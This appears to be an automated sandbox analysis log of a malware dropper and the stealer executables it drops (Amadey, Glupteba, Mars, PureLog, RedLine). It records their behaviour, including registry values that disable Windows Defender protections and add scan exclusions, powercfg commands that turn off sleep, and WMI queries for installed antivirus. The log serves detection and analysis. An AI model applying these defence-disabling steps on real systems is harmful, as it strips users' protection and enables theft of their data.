Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\xDVBd5GtHhrlSm0slOnr7_gW.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe	Queries volume information: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation

Source: C:\Users\user\Documents\SimpleAdobe\Y8KGRj_sUjw5KjZpIoRDoSwV.exe

Code function: 11_2_004026C4 GetSystemTime,

11_2_004026C4

Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe

Code function: 12_2_004143C0 GetProcessHeap,HeapAlloc,GetUserNameA,

12_2_004143C0

Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe

Code function: 12_2_004144B0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

12_2_004144B0

Source: C:\Users\user\Documents\SimpleAdobe\Y8KGRj_sUjw5KjZpIoRDoSwV.exe

Code function: 11_2_00405C44 GetVersionExA,

11_2_00405C44

Source: C:\Users\user\Desktop\i1crvbOZAP.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disable Windows Defender real time protection (registry)

Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{DC325940-6FBF-42F0-8A46-E7E120706631}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions	Registry value created: Exclusions_Extensions 1	Jump to behavior
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{DC325940-6FBF-42F0-8A46-E7E120706631}Machine\SOFTWARE\Policies\Microsoft\Windows Defender	Registry value created: DisableAntiSpyware 1	Jump to behavior
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{DC325940-6FBF-42F0-8A46-E7E120706631}Machine\SOFTWARE\Policies\Microsoft\Windows Defender	Registry value created: DisableRoutinelyTakingAction 1	Jump to behavior
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{DC325940-6FBF-42F0-8A46-E7E120706631}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableBehaviorMonitoring 1	Jump to behavior
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{DC325940-6FBF-42F0-8A46-E7E120706631}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableOnAccessProtection 1	Jump to behavior
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{DC325940-6FBF-42F0-8A46-E7E120706631}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableScanOnRealtimeEnable 1	Jump to behavior
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{DC325940-6FBF-42F0-8A46-E7E120706631}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableRealtimeMonitoring 1	Jump to behavior
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{DC325940-6FBF-42F0-8A46-E7E120706631}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableIOAVProtection 1	Jump to behavior
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{DC325940-6FBF-42F0-8A46-E7E120706631}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableRawWriteNotification 1	Jump to behavior

Exclude list of file types from scheduled, custom, and real-time scanning

Source: C:\Users\user\Desktop\i1crvbOZAP.exe

Registry value created: Exclusions_Extensions 1

Jump to behavior

Modifies Group Policy settings

Source: C:\Users\user\Desktop\i1crvbOZAP.exe

File written: C:\Windows\System32\GroupPolicy\gpt.ini

Jump to behavior

Modifies power options to not sleep / hibernate

Source: C:\Users\user\Documents\SimpleAdobe\CQTbcHuZCBIaghzHIvMnZgpt.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Documents\SimpleAdobe\CQTbcHuZCBIaghzHIvMnZgpt.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Users\user\Documents\SimpleAdobe\CQTbcHuZCBIaghzHIvMnZgpt.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Documents\SimpleAdobe\CQTbcHuZCBIaghzHIvMnZgpt.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Users\user\Documents\SimpleAdobe\CQTbcHuZCBIaghzHIvMnZgpt.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

Source: C:\Users\user\Desktop\i1crvbOZAP.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\Documents\SimpleAdobe\KUc3lCE6xAEEreIlM0ct4583.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
Source: C:\Users\user\Documents\SimpleAdobe\RMz4w55AcOQKH9K459dvrUGA.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 16.2.tiToqF4gUiKaoPfx2yS40yxZ.exe.9c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000003.1948566084.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2098966112.00000000009C1000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY

Yara detected Glupteba

Source: Yara match	File source: 13.2.RMz4w55AcOQKH9K459dvrUGA.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.KUc3lCE6xAEEreIlM0ct4583.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RMz4w55AcOQKH9K459dvrUGA.exe.2f70e67.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2170856076.00000000033B3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2145319694.0000000000843000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2877683342.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: KUc3lCE6xAEEreIlM0ct4583.exe PID: 7648, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RMz4w55AcOQKH9K459dvrUGA.exe PID: 7672, type: MEMORYSTR

Yara detected Mars stealer

Source: Yara match	File source: 12.3.D5ft_dAZwUuL52qmUM1rPffT.exe.2680000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.D5ft_dAZwUuL52qmUM1rPffT.exe.2650e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.D5ft_dAZwUuL52qmUM1rPffT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.D5ft_dAZwUuL52qmUM1rPffT.exe.2650e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.D5ft_dAZwUuL52qmUM1rPffT.exe.2680000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.D5ft_dAZwUuL52qmUM1rPffT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.1853189806.0000000002680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2508285953.0000000002650000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625ff5620.61.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.cTThtD77H613MBNsXAevJo07.exe.360000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.g1nHVnlr2tXTEWQsRz_M547D.exe.f50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29626082c80.62.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625ce8c40.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625c9c780.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625c1dde0.22.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625f327c0.39.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625cd9c00.19.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.fq9BbqPKEgDrDHrc1Aru5zuA.exe.740000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625f327c0.35.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625cff480.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.tskTMObYcvz1CtypLgyOWpYi.exe.5b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625cd9c00.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625c2f140.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625c1dde0.87.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625bfd2a0.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625cfe8b0.104.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625d0d1e0.102.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625be8caf.79.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625c69d20.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29626049220.43.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29626065420.75.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625bfd2a0.21.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625cd9c00.25.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625ff5620.55.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625d0d1e0.86.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625bcda60.92.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625c0bda0.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625be8caf.109.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29626010da0.74.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625bcda60.82.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625c50820.24.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625be8caf.115.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625c9c780.28.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625c208e0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625c168a0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.i1crvbOZAP.exe.29625bfd2a0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000000.1837512672.00000000005B2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.1841386447.0000000000F52000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1695585570.0000029625C1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.1838966350.0000000000742000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1798566425.0000029625FFE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1788980748.0000029625FFE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.1837525388.0000000000362000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1695276080.000002962602B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1808069517.00000296262CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\Start[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe, type: DROPPED

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 9.2.g1nHVnlr2tXTEWQsRz_M547D.exe.522aa90.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.cTThtD77H613MBNsXAevJo07.exe.3685570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.g1nHVnlr2tXTEWQsRz_M547D.exe.522aa90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.cTThtD77H613MBNsXAevJo07.exe.3685570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.g1nHVnlr2tXTEWQsRz_M547D.exe.51a3660.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.g1nHVnlr2tXTEWQsRz_M547D.exe.51a3660.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.g1nHVnlr2tXTEWQsRz_M547D.exe.4e727d0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2297847494.0000000003681000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
